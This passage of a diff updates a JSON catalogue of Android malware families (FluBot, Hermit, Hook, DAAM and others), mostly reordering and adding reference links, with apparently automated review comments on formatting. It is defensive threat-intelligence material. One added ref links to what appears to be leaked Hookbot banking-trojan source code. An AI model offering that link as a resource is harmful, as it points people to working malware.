@@ -841,13 +870,16 @@ "value": "CyberAzov" }, { - "description": "", + "description": "According to PCrisk, DAAM is an Android malware utilized to gain unauthorized access to targeted devices since 2021. With the DAAM Android botnet, threat actors can bind harmful code with a genuine application using its APK binding service.\r\n\r\nLookout refers to this malware as BouldSpy and assesses with medium confidence that this Android surveillance tool is used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.daam", - "https://blog.cyble.com/2023/04/20/daam-android-botnet-being-distributed-through-trojanized-applications/" + "https://blog.cyble.com/2023/04/20/daam-android-botnet-being-distributed-through-trojanized-applications/", + "https://www.lookout.com/blog/iranian-spyware-bouldspy" + ], + "synonyms": [ + "BouldSpy" ], - "synonyms": [], "type": [] }, "uuid": "37a3b62e-99da-47d7-81fb-78f745427b16", @@ -886,8 +918,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ "Defensor Digital" 
@@ -915,9 +947,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy",
- "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/",
+ "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/",
- "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf"
+ "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/"
 ],
 "synonyms": [],
 "type": []
@@ -964,6 +996,19 @@
 "uuid": "bf94eee6-2274-40f4-b181-2b49ce6ef9fb",
 "value": "Dracarys"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dragonegg",
+ "https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4ef28f14-17f4-4f87-a292-e63b42027c8c",
+ "value": "DragonEgg"
+ },
 {
 "description": "",
 "meta": {
@@ -1038,11 +1083,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac",
+ "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
 "https://twitter.com/ESETresearch/status/1445618031464357888",
- "https://blog.cyble.com/2022/05/25/ermac-back-in-action/",
 "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html",
 "https://intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover",
- "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
+ "https://blog.cyble.com/2022/05/25/ermac-back-in-action/",
 "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace"
 ],
 "synonyms": [],
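Review bot: The new DragonEgg entry in the second hunk lands with `"description": ""` even though a Lookout write-up is listed in its refs, so consumers get a named cluster with no summary at all. The same commit fills in descriptions for CryCryptor, DAAM and Hermit in other hunks; a one-sentence summary drawn from that Lookout reference would bring this entry to the same standard. Whether the new `uuid` is unique within the cluster file cannot be checked from this hunk.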
@@ -1056,9 +1101,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot", - "https://twitter.com/ThreatFabric/status/1240664876558823424", + "https://www.youtube.com/watch?v=qqwOrLR2rgU", "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", - "https://www.youtube.com/watch?v=qqwOrLR2rgU" + "https://twitter.com/ThreatFabric/status/1240664876558823424" ], "synonyms": [], "type": [] @@ -1071,13 +1116,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", + "https://www.bleepingcomputer.com/news/security/exobot-author-calls-it-quits-and-sells-off-banking-trojan-source-code/", + "https://blog.cyble.com/2022/03/24/coper-banking-trojan/", + "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/", "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/", "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html", "https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/", - "https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/", - "https://www.bleepingcomputer.com/news/security/exobot-author-calls-it-quits-and-sells-off-banking-trojan-source-code/", - "https://blog.cyble.com/2022/03/24/coper-banking-trojan/", - "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" + "https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/" ], "synonyms": [], "type": [] 
@@ -1090,9 +1135,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store", "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" ], "synonyms": [], @@ -1107,8 +1152,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.facestealer", "https://labs.k7computing.com/index.php/facestealer-the-rise-of-facebook-credential-stealer-malware/", - "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/", - "https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html" + "https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html", + "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/" ], "synonyms": [], "type": [] 
@@ -1148,11 +1193,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy",
- "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
+ "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
 "https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/",
- "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
+ "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html"
 ],
 "synonyms": [],
 "type": []
@@ -1202,7 +1247,7 @@
 "value": "FastSpy"
 },
 {
- "description": "",
+ "description": "According to heimdal, A new strain of ransomware emerged on Android mobile devices. It targets those who are running the operating system Android 5.1 and higher. This Android ransomware strain has been dubbed by security researchers FileCoder (Android/Filecoder.c) and it spreads via text messages containing a malicious link.\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder",
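Review bot: The FileCoder description added in the second hunk ends with a stray `\r\n` after "containing a malicious link." and opens with a mid-sentence capital ("According to heimdal, A new strain"), which reads as an unedited paste; the other descriptions this commit adds end on their final period. Trimming the trailing line break, `...containing a malicious link."`, keeps the field clean for consumers that render, compare or hash it.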
@@ -1219,12 +1264,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher", - "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", - "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", - "https://github.com/linuzifer/FinSpy-Dokumentation", - "https://securelist.com/finspy-unseen-findings/104322/", "https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/", - "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf" + "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://securelist.com/finspy-unseen-findings/104322/", + "https://github.com/linuzifer/FinSpy-Dokumentation", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" ], "synonyms": [], "type": [] @@ -1251,8 +1296,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", - "https://securelist.com/mobile-malware-evolution-2019/96280/", - "https://twitter.com/LukasStefanko/status/886849558143279104" + "https://twitter.com/LukasStefanko/status/886849558143279104", + "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [ "gugi" 
@@ -1267,45 +1312,45 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot", - "https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain", - "https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html", - "https://twitter.com/alberto__segura/status/1399249798063087621?s=20", - "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06", - "https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://twitter.com/alberto__segura/status/1384840011892285440", - "https://securityintelligence.com/posts/story-of-fakechat-malware/", - "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/", - "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", - "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon", - "https://twitter.com/alberto__segura/status/1395675479194095618", - "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/", - "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html", - "https://mobile.twitter.com/alberto__segura/status/1400396365759500289", - "https://hispasec.com/resources/FedexBanker.pdf", - "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9", - "https://www.infinitumit.com.tr/flubot-zararlisi/", - "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered", - "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/", - "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html", - 
"https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users", - "https://twitter.com/malwrhunterteam/status/1359939300238983172", - "https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/", - "https://blog.zimperium.com/flubot-vs-zimperium/", - "https://www.ncsc.admin.ch/22w12-de", "https://www.prodaft.com/m/reports/FluBot_4.pdf", - "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf", - "https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/", + "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9", "https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html", - "https://twitter.com/alberto__segura/status/1404098461440659459", - "https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond", - "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368", - "https://therecord.media/flubot-malware-gang-arrested-in-barcelona/", + "https://twitter.com/alberto__segura/status/1399249798063087621?s=20", "https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://mobile.twitter.com/alberto__segura/status/1400396365759500289", + "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon", + "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/", + "https://twitter.com/alberto__segura/status/1384840011892285440", + "https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/", + 
"https://twitter.com/alberto__segura/status/1402615237296148483", + "https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/", + "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://twitter.com/alberto__segura/status/1404098461440659459", + "https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html", + "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", + "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06", + "https://securityintelligence.com/posts/story-of-fakechat-malware/", + "https://twitter.com/alberto__segura/status/1395675479194095618", + "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html", + "https://www.infinitumit.com.tr/flubot-zararlisi/", + "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html", + "https://therecord.media/flubot-malware-gang-arrested-in-barcelona/", + "https://hispasec.com/resources/FedexBanker.pdf", + "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users", + "https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain", + "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/", + "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered", + "https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/", + "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf", "https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027", + "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368", + 
"https://www.ncsc.admin.ch/22w12-de", "https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones", - "https://twitter.com/alberto__segura/status/1402615237296148483" + "https://twitter.com/malwrhunterteam/status/1359939300238983172", + "https://blog.zimperium.com/flubot-vs-zimperium/", + "https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "Cabassous", 
@@ -1317,10 +1362,12 @@
 "value": "FluBot"
 },
 {
- "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.",
+ "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims\u2019 credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse",
+ "https://www.fortinet.com/blog/threat-research/fortinet-reverses-flutter-based-android-malware-fluhorse",
+ "https://cryptax.medium.com/inside-kangapack-the-kangaroo-packer-with-native-decryption-3e7e054679c4",
 "https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/"
 ],
 "synonyms": [],
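Review bot: The only change to the FluHorse description is the literal `’` becoming `\u2019`; both decode to the same JSON string, so that part of the hunk is serializer churn (an ASCII-escaping setting) rather than a content edit, and the Joker hunk later in this diff shows the same substitution. If other descriptions in the file still hold literal non-ASCII characters, the file ends up with mixed representations that make future diffs noisier; normalising the whole cluster in one pass would leave this hunk with just its real change, the two added refs.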
@@ -1362,13 +1409,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball", + "https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/", + "https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf", + "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program", + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html", "https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/", - "https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/", - "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", - "https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf", - "https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/", - "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program" + "https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/" ], "synonyms": [], "type": [] 
@@ -1381,8 +1428,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost", - "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/", - "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/" + "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/", + "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/" ], "synonyms": [], "type": [] @@ -1421,6 +1468,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gigabud", + "https://www.group-ib.com/blog/gigabud-banking-malware/", "https://blog.cyble.com/2023/01/19/gigabud-rat-new-android-rat-masquerading-as-government-agencies/" ], "synonyms": [], @@ -1434,13 +1482,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp", - "https://twitter.com/ESETresearch/status/1269945115738542080", - "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", - "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", - "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/", + "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/", "https://muha2xmad.github.io/malware-analysis/ginp/", "https://www.youtube.com/watch?v=WeL_xSryj8E", - "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/" + "https://twitter.com/ESETresearch/status/1269945115738542080", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/", + "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" ], "synonyms": [], "type": [] 
@@ -1453,10 +1501,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove",
- "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
+ "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
 "https://www.clearskysec.com/glancelove/",
- "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
- "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773"
+ "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
+ "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/"
 ],
 "synonyms": [],
 "type": []
@@ -1491,10 +1539,11 @@
 "value": "GoatRAT"
 },
 {
- "description": "According to PCrisk, GodFather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use GodFather to steal account credentials. Additionally, GodFather can steal SMSs, device information, and other data.",
+ "description": "According to PCrisk, Godfather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use Godfather to steal account credentials. Additionally, Godfather can steal SMSs, device information, and other data.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.godfather",
+ "https://brandefense.io/blog/godfather-android-banking-trojan/",
 "https://muha2xmad.github.io/malware-analysis/godfather/",
 "https://blog.group-ib.com/godfather-trojan"
 ],
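Review bot: The second hunk rewrites the description's spelling from `GodFather` to `Godfather` in three places while the entry's `value` and synonyms lie outside the hunk; if the cluster is still named `GodFather`, the description and the name now disagree on casing. Either rename consistently across `value`, synonyms and description, or keep the description spelling as it was so that text searches on the cluster name keep matching.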
@@ -1535,8 +1584,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact", - "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/", - "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail" + "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail", + "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/" ], "synonyms": [], "type": [] @@ -1589,12 +1638,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", - "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", - "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", "https://blog.talosintelligence.com/2019/10/gustuffv2.html", "https://www.group-ib.com/media/gustuff/", - "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html" + "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" ], "synonyms": [], "type": [] 
@@ -1607,9 +1656,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain", - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf", "https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/", - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" + "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" ], "synonyms": [], "type": [] @@ -1622,8 +1671,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw", - "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/", - "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw" + "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw", + "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" ], "synonyms": [], "type": [] 
@@ -1647,13 +1696,13 @@ "value": "HenBox" }, { - "description": "", + "description": "Lookout states that Hermit is an advanced spyware designed to target iOS and Android mobile devices. It is designed to collect extensive amounts of sensitive data on its victims such as their location, contacts, private messages, photos, call logs, phone conversations, ambient audio recordings, and more.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hermit", "https://de.lookout.com/blog/hermit-spyware-discovery", - "https://www.lighthousereports.nl/investigation/revealing-europes-nso", - "https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/" + "https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/", + "https://www.lighthousereports.nl/investigation/revealing-europes-nso" ], "synonyms": [], "type": [] @@ -1679,11 +1728,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad", + "https://twitter.com/LukasStefanko/status/1136568939239137280", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/", - "https://securelist.com/mobile-malware-evolution-2019/96280/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://twitter.com/LukasStefanko/status/1136568939239137280" + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [], "type": [] 
@@ -1709,8 +1758,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hook",
- "https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware",
- "https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html"
+ "https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html",
+ "https://github.com/0xperator/hookbot_source",
+ "https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware"
 ],
 "synonyms": [],
 "type": []
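Review bot: The added Hook reference `https://github.com/0xperator/hookbot_source` points at a personal GitHub repository rather than a published analysis, so its provenance and authenticity cannot be assessed from the hunk, and repositories of this kind are often taken down or changed after the fact. An archived snapshot, or a vendor write-up that cites and describes the repository, would be a more durable and verifiable reference for defenders using this cluster.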
@@ -1723,17 +1773,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra", - "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html", - "https://twitter.com/muha2xmad/status/1570788983474638849", - "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", - "https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/", - "https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0", - "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5", - "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221", - "https://cryptax.medium.com/android-bianlian-payload-61febabed00a", - "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/", "https://muha2xmad.github.io/malware-analysis/hydra/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://twitter.com/muha2xmad/status/1570788983474638849", + "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221", + "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5", + "https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0", "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/", + "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html", + "https://cryptax.medium.com/android-bianlian-payload-61febabed00a", + "https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/", "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726" ], "synonyms": [], 
@@ -1759,13 +1810,13 @@
 "value": "IPStorm (Android)"
 },
 {
- "description": "",
